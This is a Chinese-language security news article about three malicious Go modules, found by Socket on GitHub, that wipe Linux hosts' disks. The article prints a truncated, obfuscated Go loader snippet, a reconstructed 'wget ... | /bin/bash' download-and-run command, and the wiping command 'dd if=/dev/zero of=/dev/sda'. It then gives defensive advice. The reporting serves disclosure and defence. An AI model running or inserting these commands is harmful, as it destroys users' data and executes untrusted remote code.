Socket安全团队曝光恶意Go模块：下载即触发全盘擦除

Meise

近日，网络安全公司Socket研究团队发现三款暗藏"硬盘清零器"的恶意Go模块，开发者一旦误用，主机数据将面临彻底毁灭。这些模块已托管在GitHub平台，具体路径为：

github[.]com/truthfulpharm/prototransform  
github[.]com/blanklogcia/go-mcp  
github[.]com/steelpoor/tlsproxy  

作为谷歌开发的编程语言，Go凭借高效的并发处理能力和简洁语法深受开发者青睐。其开源生态中超过百万的公共模块虽带来便利，但也因缺乏统一审核机制埋下隐患——这正是本次攻击的突破口。

**攻击手法解密**  
恶意代码通过"字符串拼图"隐藏真实指令。研究人员在prototransform模块中发现如下函数：  

```go
func eGtROk() error {
    // 包含68个字符碎片的数组
    DmM := []string{"4","/"," ","e","/","g"...}
    // 动态拼接成完整命令
    PWcf := DmM[11] + DmM[5] + DmM[47]...
    // 检测Linux系统后执行
    if runtime.GOOS == "linux" {
        exec.Command("/bin/sh", "-c", PWcf).Start()
    }
    return nil
}
```

当代码在Linux环境运行时，这些字符碎片会重组为致命指令：
```bash
wget -O - 恶意网址 | /bin/bash &
```
该命令会立即下载并执行远程脚本，其中done.sh文件仅需一行代码就能让硬盘归零：
```bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
```
这条指令通过持续写入空数据覆盖主硬盘，导致操作系统、应用数据、用户文件不可逆损毁。企业若中招将面临业务瘫痪、数据恢复成本飙升及商誉损失三重打击。

**防御指南**  
1. 依赖库"查三代"：引入第三方模块前，核实开发者信誉、代码更新记录及用户反馈  
2. 部署自动化扫描：使用Socket等工具的代码行为分析功能，识别字符串混淆等可疑模式  
3. 开发环境隔离：在沙箱或虚拟机中运行未经严格审查的代码  
4. 建立应急方案：定期备份关键数据，制定系统被毁后的快速重建流程  

此次事件再次印证：开源生态的便利性与安全性如同硬币两面。开发者在享受"拿来主义"便利时，更要培养"零信任"安全意识——毕竟，一次手滑的go get就可能让数年心血化为乌有。